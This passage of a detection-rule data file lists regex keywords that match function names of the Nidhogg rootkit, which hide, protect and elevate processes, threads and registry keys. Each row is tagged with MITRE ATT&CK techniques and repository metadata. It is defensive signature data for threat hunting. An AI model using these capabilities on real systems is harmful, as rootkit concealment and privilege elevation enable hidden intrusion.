- T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - 
T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ModuleUtils::NidhoggReadData*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggReadData.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ModuleUtils::NidhoggWriteData*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggWriteData.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - 
T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ProcessUtils::NidhoggProcessClearAllProtection*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessClearAllProtection.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ProcessUtils::NidhoggProcessElevate*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessElevate.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - 
T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ProcessUtils::NidhoggProcessHide*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessHide.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ProcessUtils::NidhoggProcessProtect*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessProtect.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - 
T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ProcessUtils::NidhoggProcessSetProtection*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessSetProtection.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" 
"*Nidhogg::ProcessUtils::NidhoggProcessUnhide*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessUnhide.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ProcessUtils::NidhoggProcessUnprotect*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessUnprotect.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - 
TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ProcessUtils::NidhoggQueryProcesses*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggQueryProcesses.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ProcessUtils::NidhoggQueryThreads*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggQueryThreads.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 
- T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ProcessUtils::NidhoggThreadHide*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggThreadHide.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ProcessUtils::NidhoggThreadProtect*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggThreadProtect.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - 
T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::RegistryUtils::NidhoggRegistryClearAll*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryClearAll.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::RegistryUtils::NidhoggRegistryHideKey*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryHideKey.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - 
T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::RegistryUtils::NidhoggRegistryHideValue*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryHideValue.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::RegistryUtils::NidhoggRegistryProtectKey*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryProtectKey.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - 
T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::RegistryUtils::NidhoggRegistryProtectValue*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryProtectValue.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" 
"*Nidhogg::RegistryUtils::NidhoggRegistryQueryHiddenKeys*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryQueryHiddenKeys.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::RegistryUtils::NidhoggRegistryQueryHiddenValues*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryQueryHiddenValues.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - 
T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::RegistryUtils::NidhoggRegistryQueryProtectedKeys*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryQueryProtectedKeys.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::RegistryUtils::NidhoggRegistryQueryProtectedValues*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryQueryProtectedValues.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - 
T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::RegistryUtils::NidhoggRegistryUnhideKey*",".{0,1000}Nidhogg\:\:RegistryUtils\:\:NidhoggRegistryUnhideKey.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" 